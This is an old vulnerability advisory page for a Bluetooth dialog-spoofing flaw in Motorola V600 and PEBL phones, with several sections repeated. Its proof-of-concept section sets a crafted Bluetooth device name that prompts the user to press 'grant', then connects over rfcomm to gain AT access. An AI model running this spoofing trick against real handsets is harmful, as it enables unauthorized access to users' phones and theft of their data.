Motorola Bluetooth Interface Dialog Spoofing Vulnerability
BID:17190
Info
Motorola Bluetooth Interface Dialog Spoofing Vulnerability
| Bugtraq ID: | 17190 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 22 2006 12:00AM |
| Updated: | Mar 22 2006 07:39PM |
| Credit: | Discovered by Kevin Finisterre. |
| Vulnerable: |
Motorola V600 Motorola PEBL U6 |
| Not Vulnerable: | |
Discussion
Motorola Bluetooth Interface Dialog Spoofing Vulnerability
Motorola mobile handsets are prone to a dialog-spoofing vulnerability when accepting Bluetooth communications. An attacker could exploit this issue to trick a user into granting them AT access to the device. The attacker could then gather confidential information from the handset.
Motorola PEBL and V600 handsets are vulnerable to this issue; other devices may also be affected.
Motorola mobile handsets are prone to a dialog-spoofing vulnerability when accepting Bluetooth communications. An attacker could exploit this issue to trick a user into granting them AT access to the device. The attacker could then gather confidential information from the handset.
Motorola PEBL and V600 handsets are vulnerable to this issue; other devices may also be affected.
Exploit / POC
Motorola Bluetooth Interface Dialog Spoofing Vulnerability
The following proof of concept is available:
# hciconfig hci0 name `perl -e 'print "Press\x0dgrant\x0dto\x0ddisable\x0dmute\x0d\x0d"'`
# rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant)
Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3
Press CTRL-C for hangup
The following proof of concept is available:
# hciconfig hci0 name `perl -e 'print "Press\x0dgrant\x0dto\x0ddisable\x0dmute\x0d\x0d"'`
# rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant)
Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3
Press CTRL-C for hangup
Solution / Fix
Motorola Bluetooth Interface Dialog Spoofing Vulnerability
Solution:
Motorola has reportedly addressed this issue, but Symantec has not confirmed this. Please contact the vendor for more information.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Motorola has reportedly addressed this issue, but Symantec has not confirmed this. Please contact the vendor for more information.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
References
Motorola Bluetooth Interface Dialog Spoofing Vulnerability
References:
References:
- Motorola PEBL (Motorola)
- Motorola V600 (Motorola)
- DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline attack' ("KF \(lists\)"